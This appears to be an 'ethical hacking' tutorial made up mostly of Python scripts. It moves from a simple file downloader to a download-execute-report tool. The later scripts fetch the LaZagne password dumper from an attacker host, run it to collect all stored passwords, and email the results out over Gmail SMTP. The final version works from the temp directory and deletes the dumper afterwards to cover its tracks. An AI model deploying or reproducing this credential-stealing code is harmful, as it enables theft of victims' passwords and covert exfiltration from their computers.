Python Ethical Hacking

DOWNLOAD_FILE

• Download files on a system.
• Once packaged properly will work on all operating systems.
• Simple but powerfull.

Can be used in many situations:

• download _file + execute_command = download_and_execute
• download_file + execute_and_report = download_execute_and_report
• ...etc

#!/usr/bin/env python
import requests


def download(url):
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    with open(file_name, "wb") as out_file:
        out_file.write(get_response.content)


download("https://cdn.spacetelescope.org/archives/images/screen/potw1739a.jpg")

 DOWNLOAD_EXECUTE_AND_REPORT

• Download files on a system.
• Execute a command that uses this file.
• Report results in our email.
• Cross multi-Platform!!

Ex: remotely steal all stored passwords on a computer!

Using the LaZagne tool:https://github.com/AlessandroZ/LaZagne

lazagne.exe --help

 Use the following command to find all the passwords in the current system.

 lazagne.exe all

 Steal saved passwords remotely

#!/usr/bin/env python
import requests
import smtplib
import subprocess


def download(url):
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    with open(file_name, "wb") as out_file:
        out_file.write(get_response.content)


def send_mail(email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()


download("http://10.0.0.43/evil-files/lazagne.exe")
result = subprocess.check_output("lazagne.exe all", shell=True)
print(result.decode())
send_mail("aaaa@gmail.com", "1111111", result)

Optimize the Python Script - Interacting with the file system. The evil file will be downloaded in the temp directory and removed after executed. 

#!/usr/bin/env python
import os
import smtplib
import subprocess
import requests
import tempfile


def download(url):
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    with open(file_name, "wb") as out_file:
        out_file.write(get_response.content)


def send_mail(email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()


temp_directory = tempfile.gettempdir()
os.chdir(temp_directory)
download("http://10.0.0.43/evil-files/lazagne.exe")
result = subprocess.check_output("lazagne.exe all", shell=True)
print(result.decode())
send_mail("aaaa@gmail.com", "1111111", result)
os.remove("lazagne.exe")